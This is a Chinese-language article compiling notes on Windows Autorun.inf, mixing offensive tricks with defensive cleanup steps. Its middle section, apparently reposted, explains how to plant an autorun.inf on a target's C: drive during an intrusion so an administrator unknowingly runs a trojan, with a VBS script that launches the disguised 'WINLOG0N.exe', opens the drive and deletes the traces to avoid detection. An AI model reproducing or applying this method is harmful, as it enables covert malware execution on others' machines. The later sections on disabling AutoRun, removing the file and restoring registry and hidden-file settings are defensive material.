Autorun.inf的新寫法與應用以及防禦

首先是autorun.inf
一般的病毒的Autorun.inf檔案內容為
[autorun]
open=.\RECYCLER\RECYCLER\autorun.exe

shell\1=Open
shell\1\Command=.\RECYCLER\RECYCLER\autorun.exe
shell\2\=Browser
shell\2\Command=.\RECYCLER\RECYCLER\autorun.exe

shellexecute=.\RECYCLER\RECYCLER\autorun.exe
它的效果是當雙擊開啟盤時.會運行RECYCLER\RECYCLER\autorun.exe檔案,用右鍵開啟,會顯示Open,Browser.
還有一種是
[autorun]
OPEN=SVCH0ST.EXE
shell\open=開啟(&O)
shell\open\Command=SVCH0ST.EXE
shell\open\Default=1
shell\explore=資源管理員(&X)
shell\explore\Command=SVCH0ST.EXE
對於這種隨身碟病毒，無論右鍵選擇“開啟”還是“資源管理員”病毒都會運行。
一種利用autorun.inf提權的方法（轉）
以前看過很多關於AutoRun.inf的利用文章,網上全是千篇一律,互相模仿.我再來添點東西吧~

還是先簡單說下原理吧.寫一個AutoRun.inf檔案,放在對方某一盤符下,當管理員雙擊此盤時,就會執行AutoRun.inf指定的檔案了.一般用在入侵時沒有運行許可權時,欺騙管理員幫你運行..

以前我在網上看到的都是一個模式

[AutoRun]

open = 你想啟動並執行程式

先不說這樣運行是不是成功的,稍微想一下,就知道有問題,人家管理員不是傻子,這樣雙擊是打不開盤符的,人家肯定知道出問題了,所以你玩不長的..

事實上那個檔案在我機子是運行不起的,網上也沒找到解決辦法,相信還有很多人和我遇到過同樣的問題,求人不如求已,自己搞定吧.

也不難,只要這樣寫就OK了:

[AutoRun]
open=AutoRun.exe
shellexecute=AutoRun.exe
shell\Auto\command=AutoRun.exe

這樣,你把它儲存為一個.inf檔案,放在C盤下,AutoRun.exe為你指定的運行程式.這樣雙擊C盤就可以成功運行了.前面還說過一個問題,就是C盤打不開,很容易就被管理員發現了,有待改進.下來就說怎麼解決這個問題,GO ON!

其實這個實現起來也不難,先把AutoRun.inf上傳至對方C盤,我們可以做一個自解壓包,也放在C盤根目錄下,讓他成為我們的指定運行檔案,裡麵包含我們要啟動並執行程式,比如木馬,還一個VBS指令碼,自解壓包執行後先讓他執行VBS指令碼,內容如下:

set yu=wscript.createobject("wscript.shell")
yu.run "cmd /c start WINLOG0N.exe",0
yu.run "cmd /c del AutoRun.inf",0
yu.run "cmd /c start c:\",0
yu.run "cmd /c del AutoRun.vbs",0

我再簡單解釋下,解壓後VBS幫我們運行winlogon.exe(我配置好的木馬),然後刪掉AutoRun.inf,為什麼要刪掉它,第一,減少被發現的機會,二,刪掉它,管理員重啟機子或登出後如果右鍵點擊盤複符不會出現"播放",一切恢複中馬前的狀態,當然之前我們的木馬已經運行了.第四行代碼: 我們為他開啟C盤,最後再刪掉vbs指令碼自身.

這樣改進後個人覺得安全性大大提高了.呵呵..各位在測試的時候只須把上面指令碼中的 WINLOG0N.exe改為自己的木馬就可以了.winxp sp2下測試成功。
防治方法
其實這個檔案不是病毒。也是用來開啟病毒了。防治它的思路有兩種：一是禁用自動播放，二是刪除它，三是阻止它產生。
1。在Windows系統有允許和阻止自動啟動並執行索引值的方法：

　　 在註冊表中找到如下鍵：

鍵路徑：[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Exploer]

在右側邊窗格中有 "NoDriveTypeAutoRun"這個鍵決定了是否執行Autorun功能.其中每一位代表一個裝置,不同裝置用以下數值表示:

裝置名稱 第幾位 值 裝置用如下數值表示 裝置名稱含義
DRIVE_UNKNOWN 0 1 01h 不能識別的類型裝置
DRIVE_NO_ROOT_DIR 1 0 02h 沒有根目錄的磁碟機
DRIVE_REMOVABLE 2 1 04h 抽取式磁碟機
DRIVE_FIXED 3 0 08h 固定的磁碟機
DRIVE_REMOTE 4 1 10h 網路磁碟機
DRIVE_CDROM 5 0 20h 光碟機
DRIVE_RAMDISK 6 0 40h RAM磁碟

其中： 保留 7 1 80h 　未指定的磁碟機類型

以上值"0"表示裝置運行，"1"表示裝置不運行。
從上面可以看出，對應的DRIVE_NO_ROOT_DIR、DRIVE_FIXED、DRIVE_CDROM、DRIVE_RAMDISK是可以自動啟動並執行。所以要禁止硬碟自動運行AutoRun.inf檔案，就必須將DRIVE_FIXED這些鍵的值設為1，由於DRIVE_FIXED代表固定的磁碟機(即硬碟)。如果僅想禁止軟體光碟片的AutoRun功能，但又保留對CD音頻碟的自動播放能力，這時只需將“NoDriveTypeAutoRun”的索引值改為：BD,00,00,00即可。
    還有就是通過組策略關閉自動播放，但是在有些版本window xp 中不存在哪個策略。
2。為了防止autorun.inf的產生，我們可以在u盤根目錄下建立一個名字是autorun.inf的檔案夾。
3。我們可以選擇在dos下刪除檔案，但是在通常情況下autorun.inf有系統，隱藏，唯讀屬性。所以應該先去掉這些屬性之後再刪除檔案。具體方法如下：
開始---運行---cmd（開啟命令提示字元）
D: dir /a a* （沒有參數A是看不到的，A是顯示所有的意思）
此時你會發現一個autorun.inf檔案，
attrib autorun.inf -s -h -r 去掉autorun.inf檔案的系統、唯讀、隱藏屬性。然後就可以刪除了
del AutoRun.inf
二.常見的病毒
通過autorun檔案可以開啟任何檔案，所以很難講什麼是常見的。我所覺得有趣的是，運行病毒之後，病毒的自我保護方法。比如說存在保護程式，禁用註冊表，禁用顯示隱藏檔案選項或檔案夾選項。隱藏進程等等。
1。註冊表的禁用與解用。

最好的方法是下載個註冊表修複工具
你先到這裡看看瑞星的註冊表修複工具http://it.rising.com.cn/service/technology/RegClean_download.htm
如果仍然不能解決請按1樓的方法試試
假如"運行"被禁止掉那麼請用下面介紹的方法

登錄編輯程式已被禁用，我們用INF檔案來解除。那麼我們可以在記事本裡寫入下面的內容：
[Version]
Signature="$Windows NT$"

[DefaultInstall]
ADDREG=Myadd

[Myadd]
;解禁登錄編輯程式
HKCU,Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools,1,0

然後把檔案另存新檔一個INF檔案，右擊檔案----點“安裝”就可以啦^O^
我們可以看到第一個語段，在Signature後面的簽名"$Windows NT$"它是指明我的作業系統是NT的，如果你的作業系統是98的在後面的簽名中應該寫"$CHICAGO$"。
再看第二個語段，等號左邊的“ADDREG”是不能更改的，等號右邊的內容就隨你的心情啦，但是有一點要注意，就是要與在第三個語段中使用的語句保持一致。另外還有一項操作是“DELREG”(刪除鍵)和“ADDREG”的用法一樣，後面介紹。
好了，這回各位看觀是不是想要躍躍欲試了呢，不要著急，好像還有一點和REG檔案不一樣噢，呵呵我看出來了，就是在檔案的最後，怎麼有“，”(註：逗號)。還有“HKCU”這些都是什麼呀？
這就是與REG檔案不一樣的格式啦。
“HKCU”指的是註冊表中的根鍵，其中“HKCU”是“HKEY_CURRENT_USER”的縮寫，其它的還有“HKCR”--- “HKEY_CLASSES_ROOT”、“HKLM”----“HKEY_LOCAL_MACHINE”、“HKU”---- “HKEY_USERS”、“HKCC”----“HKEY_CURRENT_CONFIG”、“HKDD”----“HKEY_DYN_DATA”。如果你想要對哪個根鍵操作那麼就可以按照上面的縮寫對號入座了。
“，”(註：逗號)，它是根鍵與子鍵、子鍵與鍵名、鍵名與鍵類型、鍵類型與索引值的分割符。
在具體修改註冊表索引值語段的格式為：根鍵，子鍵，鍵名，鍵類型，索引值(註：中間的逗號不能省略)。
上面這個檔案中我們知道其實要修改的是DisableRegistryTools鍵，把它的值改為“0”。它的類型為DWORD(雙位元組)，在INF檔案有關註冊表的操作中有字串類型(用“0”表示)和二進位類型(用“1”表示)，在網上沒有找到INF檔案表示雙位元組類型的資料，望知道的人補充。在這裡我們直接用二進位類型就可以了，所以大家看到在鍵類型的位置上是個“1”，最後是要修改的索引值“0”。
前面提到“DELREG”它是刪除索引值的操作，如果要想把DisableRegistryTools鍵刪除的話可以這樣寫：
[Version]
Signature="$Windows NT$"

[DefaultInstall]
DELREG=Mydel

[Mydel]
;刪除DisableRegistryTools鍵
HKCU,Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools

就是省略掉鍵類型和索引值欄位，最後把這個檔案另存新檔一個INF檔案，右擊檔案----點“安裝”就可以了。
好了，不知道各位看觀是不是看明白了，沒看明白也沒關係，我寫了一個，大家只要把下面的內容複寫到記事本中，然後把這個檔案另存新檔一個INF檔案，最後右擊檔案----點“安裝”就可以了。(註：這個檔案可以解決前文中所提到問題，只能在NT系統中使用，首頁會被改成20CN的首頁，嘻嘻做個廣告啦 ^O^)。

-----------------------------------------------------------------------------------
[Version]
Signature="$Windows NT$"

[DefaultInstall]
ADDREG=Myadd

[Myadd]
;解禁登錄編輯程式
HKCU,Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools,1,0
2。顯示出被隱藏的系統檔案

運行——regedit

HKEY_LOCAL_MACHINE\Software\Microsoft\windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL，將CheckedValue索引值修改為1

這裡要注意，病毒會把本來有效DWORD值CheckedValue刪除掉，建立了一個無效的字串值CheckedValue，並且把索引值改為0！我們將這個改為1是毫無作用的。（有部分病毒變種會直接把這個CheckedValue給刪掉，只需和下面一樣，自己再重建立一個就可以了）

方法：刪除此CheckedValue索引值，單擊右鍵 建立——Dword值——命名為CheckedValue，然後修改它的索引值為1，這樣就可以選擇“顯示所有隱藏檔案”和“顯示系統檔案”。

在檔案夾——工具——檔案夾選項中將系統檔案和隱藏檔案設定為顯示。